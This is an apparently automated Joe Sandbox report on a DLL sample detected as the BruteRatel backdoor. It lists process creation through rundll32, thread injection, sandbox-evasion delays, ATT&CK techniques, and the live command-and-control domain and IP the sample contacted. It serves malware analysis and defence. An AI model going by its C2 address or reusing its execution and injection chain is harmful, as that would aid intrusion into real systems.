Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 43.206.237.192:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 43.206.237.192:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 43.206.237.192:443 -> 192.168.2.4:49734 version: TLS 1.2

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00007FFE133025E0 NtAllocateVirtualMemory,NtProtectVirtualMemory,NtCreateThreadEx,VirtualFreeEx,

3_2_00007FFE133025E0

Source: C:\Windows\System32\rundll32.exe	Code function: 3_3_000001CDED27BA3A	3_3_000001CDED27BA3A
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FFE133025E0	3_2_00007FFE133025E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E8C8766150	5_2_000001E8C8766150
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E8C8764120	5_2_000001E8C8764120
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E8C8761D00	5_2_000001E8C8761D00
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E8C87644F0	5_2_000001E8C87644F0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E8C874C9C0	5_2_000001E8C874C9C0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E8C876E1B0	5_2_000001E8C876E1B0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E8C87701B0	5_2_000001E8C87701B0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E8C8759580	5_2_000001E8C8759580
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E8C8745EC0	5_2_000001E8C8745EC0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E8C875A2A0	5_2_000001E8C875A2A0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E8C876F690	5_2_000001E8C876F690
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E8C8752B60	5_2_000001E8C8752B60
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E8C8757750	5_2_000001E8C8757750
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E8C8756730	5_2_000001E8C8756730
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E8C87533A0	5_2_000001E8C87533A0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E8C875EBA0	5_2_000001E8C875EBA0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E8C8758B90	5_2_000001E8C8758B90
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E8C8760380	5_2_000001E8C8760380
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E8C874AF70	5_2_000001E8C874AF70
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E8C874A020	5_2_000001E8C874A020
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E8C8752010	5_2_000001E8C8752010
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E8C8763010	5_2_000001E8C8763010
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E8C87650E0	5_2_000001E8C87650E0

Source: IMS64.dll.dll

Static PE information: Number of sections : 11 > 10

Source: classification engine

Classification label: mal76.troj.evad.winDLL@10/0@1/1

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000001E8C875CAD0 CreateToolhelp32Snapshot,Thread32First,

5_2_000001E8C875CAD0

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
Source: C:\Windows\System32\rundll32.exe	Mutant created: NULL

Source: IMS64.dll.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll64.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\IMS64.dll.dll,main

Source: IMS64.dll.dll	ReversingLabs: Detection: 28%
Source: IMS64.dll.dll	Virustotal: Detection: 26%

Source: unknown	Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\IMS64.dll.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\IMS64.dll.dll,main
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",main
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\IMS64.dll.dll,main	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",main	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",#1	Jump to behavior

Source: C:\Windows\System32\loaddll64.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: kernel.appcore.dll			Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: IMS64.dll.dll

Static PE information: Image base 0x205d50000 > 0x60000000

Source: IMS64.dll.dll

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source: IMS64.dll.dll

Static PE information: section name: .xdata

Source: C:\Windows\System32\rundll32.exe

Code function: 4_2_000001FB0D91C282 pushad ; ret

4_2_000001FB0D91C2F1

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Code function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,

5_2_000001E8C87624C0

Source: C:\Windows\System32\rundll32.exe

API coverage: 0.0 %

Source: C:\Windows\System32\loaddll64.exe TID: 7312

Thread sleep time: -120000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\loaddll64.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: rundll32.exe, 00000003.00000002.4122414649.000001CDED148000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2024553634.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4122414649.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2337575131.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4122385364.000001FB0D930000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3711576277.000001FB0D930000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2024250096.000001FB0D935000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4122385364.000001FB0D8D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4122196214.000001E8C6C56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4122196214.000001E8C6BEF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4122196214.000001E8C6C3D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000001E8C874D5C0 LdrGetProcedureAddress,

5_2_000001E8C874D5C0

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000001E8C874A8B0 RtlAddVectoredExceptionHandler,

5_2_000001E8C874A8B0

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe

Network Connect: 43.206.237.192 443

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 7396	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 7396	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 7372	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 7372	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 7396	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread register set: target process: 7396	Jump to behavior

Sets debug register (to hijack the execution of another thread)

Source: C:\Windows\System32\rundll32.exe

Thread register set: 7396 1

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\IMS64.dll.dll",#1

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000001E8C87624C0 GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,

5_2_000001E8C87624C0

Stealing of Sensitive Information

Yara detected BruteRatel

Source: Yara match

File source: Process Memory Space: rundll32.exe PID: 7500, type: MEMORYSTR

Remote Access Functionality

Yara detected BruteRatel

Source: Yara match

File source: Process Memory Space: rundll32.exe PID: 7500, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	11 Virtualization/Sandbox Evasion	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	311 Process Injection	LSASS Memory	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	13 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Rundll32	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
IMS64.dll.dll	29%	ReversingLabs	Win64.Backdoor.Brutel
IMS64.dll.dll	27%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
https://javaforyouedu.in/rofl/adminy	0%	Avira URL Cloud	safe
https://javaforyouedu.in/rofl/admin=	0%	Avira URL Cloud	safe
https://javaforyouedu.in/rofl/admin8x	0%	Avira URL Cloud	safe
https://javaforyouedu.in/rofl/admin9	0%	Avira URL Cloud	safe
https://javaforyouedu.in/	0%	Avira URL Cloud	safe
https://javaforyouedu.in/rofl/admino	0%	Avira URL Cloud	safe
https://javaforyouedu.in/rofl/admin4	0%	Avira URL Cloud	safe
https://javaforyouedu.in/rofl/admins	0%	Avira URL Cloud	safe
https://javaforyouedu.in/	0%	Virustotal		Browse
https://javaforyouedu.in/rofl/admin2	0%	Avira URL Cloud	safe
https://javaforyouedu.in/wA	0%	Avira URL Cloud	safe
https://javaforyouedu.in/rofl/adminM	0%	Avira URL Cloud	safe
https://javaforyouedu.in/rofl/adminL	0%	Avira URL Cloud	safe
https://javaforyouedu.in/rofl/adminxcn(	0%	Avira URL Cloud	safe
https://javaforyouedu.in/rofl/adminA	0%	Avira URL Cloud	safe
https://javaforyouedu.in/rofl/admin~	0%	Avira URL Cloud	safe
https://javaforyouedu.in/O	0%	Avira URL Cloud	safe
https://javaforyouedu.in/rofl/adminD	0%	Avira URL Cloud	safe
https://javaforyouedu.in/rofl/adminYcM(	0%	Avira URL Cloud	safe
https://javaforyouedu.in/H	0%	Avira URL Cloud	safe
https://javaforyouedu.in/rofl/adminN	0%	Avira URL Cloud	safe
https://javaforyouedu.in/rofl/admini	0%	Avira URL Cloud	safe
https://javaforyouedu.in/rofl/admin	0%	Avira URL Cloud	safe
https://javaforyouedu.in/rofl/adminA	0%	Virustotal		Browse
https://javaforyouedu.in/rofl/admink	0%	Avira URL Cloud	safe
https://javaforyouedu.in/-	0%	Avira URL Cloud	safe
https://javaforyouedu.in/rofl/admin#	0%	Avira URL Cloud	safe
https://javaforyouedu.in/rofl/adminux	0%	Avira URL Cloud	safe
https://javaforyouedu.in/rofl/admin	0%	Virustotal		Browse
https://javaforyouedu.in/rofl/admin#	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
javaforyouedu.in	43.206.237.192	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://javaforyouedu.in/rofl/admin	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://javaforyouedu.in/rofl/admin8x	rundll32.exe, 00000003.00000002.4122414649.000001CDED1DA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2337575131.000001CDED1DB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2024553634.000001CDED1DB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://javaforyouedu.in/rofl/admin9	rundll32.exe, 00000005.00000003.3122503909.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3851106609.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2483934674.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://javaforyouedu.in/rofl/adminy	rundll32.exe, 00000005.00000003.3597962223.000001E8C6C8B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://javaforyouedu.in/	rundll32.exe, 00000003.00000002.4122414649.000001CDED202000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2024553634.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4122414649.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2337575131.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2337575131.000001CDED207000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4122385364.000001FB0D930000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3711576277.000001FB0D930000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2640820421.000001FB0D995000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2024250096.000001FB0D935000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2336710000.000001FB0D995000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3122503909.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4122196214.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4122196214.000001E8C6C56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3851106609.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3597962223.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3385284343.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://javaforyouedu.in/rofl/admin=	rundll32.exe, 00000004.00000003.3711576277.000001FB0D918000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4122385364.000001FB0D918000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://javaforyouedu.in/rofl/admino	rundll32.exe, 00000004.00000003.3711716551.000001FB0D9B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2640820421.000001FB0D995000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2640866940.000001FB0D9B0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2024200405.000001FB0D995000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2853714968.000001FB0D994000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2336772158.000001FB0D9B0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4122385364.000001FB0D994000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2336710000.000001FB0D995000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2853768398.000001FB0D9B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://javaforyouedu.in/rofl/admin4	rundll32.exe, 00000003.00000003.3145988406.000001CDED22A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://javaforyouedu.in/rofl/admins	rundll32.exe, 00000005.00000002.4122196214.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://javaforyouedu.in/rofl/admin2	rundll32.exe, 00000005.00000003.2318339849.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://javaforyouedu.in/wA	rundll32.exe, 00000004.00000002.4122385364.000001FB0D930000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3711576277.000001FB0D930000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2024250096.000001FB0D935000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://javaforyouedu.in/rofl/adminM	rundll32.exe, 00000005.00000003.3122503909.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2318339849.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2484020877.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1958211641.000001E8C6CD5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3851202401.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3385381204.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1958118482.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3597962223.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4122196214.000001E8C6CD6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://javaforyouedu.in/rofl/adminL	rundll32.exe, 00000004.00000003.3711576277.000001FB0D994000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://javaforyouedu.in/rofl/adminxcn(	rundll32.exe, 00000004.00000003.3711576277.000001FB0D966000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://javaforyouedu.in/rofl/adminA	rundll32.exe, 00000004.00000002.4122385364.000001FB0D994000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3597962223.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3385284343.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://javaforyouedu.in/rofl/admin~	rundll32.exe, 00000004.00000003.1716599072.000001FB0D991000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1717104370.000001FB0D991000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://javaforyouedu.in/O	rundll32.exe, 00000005.00000003.2318339849.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2483934674.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://javaforyouedu.in/rofl/adminD	rundll32.exe, 00000005.00000003.3597962223.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2483934674.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://javaforyouedu.in/rofl/adminYcM(	rundll32.exe, 00000004.00000003.3711576277.000001FB0D966000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://javaforyouedu.in/H	rundll32.exe, 00000004.00000003.1716599072.000001FB0D991000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1717104370.000001FB0D991000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://javaforyouedu.in/rofl/adminN	rundll32.exe, 00000005.00000003.3122503909.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3851106609.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3597962223.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3385284343.000001E8C6CB6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://javaforyouedu.in/rofl/admini	rundll32.exe, 00000005.00000003.2483934674.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1958118482.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3122503909.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3597962223.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2318339849.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3385284343.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3851106609.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4122196214.000001E8C6C85000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://javaforyouedu.in/rofl/admink	rundll32.exe, 00000004.00000003.3711576277.000001FB0D918000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4122385364.000001FB0D918000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://javaforyouedu.in/-	rundll32.exe, 00000003.00000003.2024553634.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4122414649.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2337575131.000001CDED19F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://javaforyouedu.in/rofl/admin#	rundll32.exe, 00000005.00000003.2483934674.000001E8C6C8B000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://javaforyouedu.in/rofl/adminux	rundll32.exe, 00000003.00000002.4122414649.000001CDED1DA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2337575131.000001CDED1DB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2024553634.000001CDED1DB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
43.206.237.192	javaforyouedu.in	Japan		4249	LILLY-ASUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1500442
Start date and time:	2024-08-28 13:37:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	IMS64.dll.dll (renamed file extension from exe to dll)
Original Sample Name:	IMS64.dll.exe
Detection:	MAL
Classification:	mal76.troj.evad.winDLL@10/0@1/1
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 10 Number of non-executed functions: 3
Cookbook Comments:	Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target rundll32.exe, PID 7396 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:37:57	API Interceptor	1x Sleep call for process: loaddll64.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
